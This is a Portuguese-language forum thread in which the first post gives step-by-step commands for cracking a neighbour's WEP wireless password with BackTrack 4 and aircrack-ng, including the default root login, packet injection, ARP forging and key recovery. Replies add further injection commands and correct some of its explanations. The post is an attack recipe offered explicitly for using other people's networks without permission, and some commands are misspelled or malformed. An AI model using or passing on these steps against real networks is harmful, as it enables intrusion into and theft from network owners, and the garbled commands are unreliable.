Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Quebrando A Senha Wireless Wep Usando Backtrack 4 !!!

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Quebrando A Senha Wireless Wep Usando Backtrack 4 !!!

    Quebrando A Senha Wireless Wep Usando Backtrack 4 !!! como ter internet wireless do vizinho quebrando a senha wep dele
    passo a passo de como quebrar a senha wep em 9 comandos

    baixe aqui o backtrack 4 depos grave no dvd renicio o pc de o boot e
    vai pedir senha e login
    login: root
    senha: toor

    depos digita (startx) sem parentese pra iniciar o back track 4


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    abra o console pra fazer os comandos

    1: airmon-ng
    (esse comando faz com que o bt4 reconheça a sua placa de rede)

    2: airmon-ng start wlan0
    (esse comando faz com que fique em modo monitor)

    3: airodump-ng mon0
    (esse comando faz com que ele procure as redes ao seu redor)

    abra outro console

    4: airodump-ng --bssid (bssid) --channel x --ivs -w nome rede mon0
    (esse comando faz com que vc monitore a rede da vitima)

    abra outro console

    5: aireplay-ng -5 -b (bssid) mon0
    (espere ele vai pedir pra vc colocar o y depos enter com esse comando vc pega os pacotes da vitima)

    abra outro console

    6: aireplay-ng -1 1 -a (bssid) mon0
    (esse comando capita os pacotes criptados da vitima)

    abra outro console

    7: packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y (fragments) -w arpy
    (esse comando capita os date da vitima)

    abra outro console

    8: airopley-ng -3 -r arpy -b (bssid) mon0

    abra outro console

    9: aircrack-ng nome rede-01.ivs
    (aqui é o final a ora de vc saber a senha da rede wep eu aconselho a vc espera pelomenos 10.000 pacotes pra pegar a senha mais se vc quizer com 5.000 tbm pode )

  • Font Size
    #2
    Mas nao tem q ter um tipo específico de antena ou um driver suportado pra rodar essa bagaça?
    ah, o link ta quebrado tb, mas parece q no site oficial da pra baixar

    Comment


    • Font Size
      #3
      oi amigo blz? gostei tem um ou outro comando que eu não tinha visto, mais que tal não complicar tanto a quebra do WEP, ja que essa chave a quebra dela tem como foco a aceleração dos dados para a captura dos ivs, vamos esclarecer algumas coisinhas para ficar mais complexo e preciso no intendimento.

      o comando #Airmon-ng, ele n faz com que o bt reconheça sua placa de rede, mais sim apenas mostra delalhes, tal como o modo em que ela esta operando, que no caso dos notbooks sem fio é wlan0, e qnd vc bota ela em modo de monitorando aparece tb oq ela esta monitorando, que no caso tb seria mon0.

      Ao inves desses comando que vc diz que capta os dates do AP, pq não vai direto no foco? que é acelerar apenas os date se é isso o que interessa, aireplay-ng -3 -b (mac) mon0 e aireplay-ng -3 -b (Mac do Ap) -h (mac do cara que é o station) mon0, isso vai acelerar os dates para a quebra.

      E quando falam em relação a 5.000 dates ja quebra, 10.000 datas ja quebra eu estou aqui para te afirmar com toda certeza do mundo que isso tudo é mito, em relação ao date ele apenas varia de acordo com o tamanho da chave, tanto tem chave com 5.000 vc ja quebra como ja teve chave que eu quebrei somente com 80.000 dates!! tranquilidade e abraçooo.
      ĿэtђØяn

      Comment

      X
      Working...
      X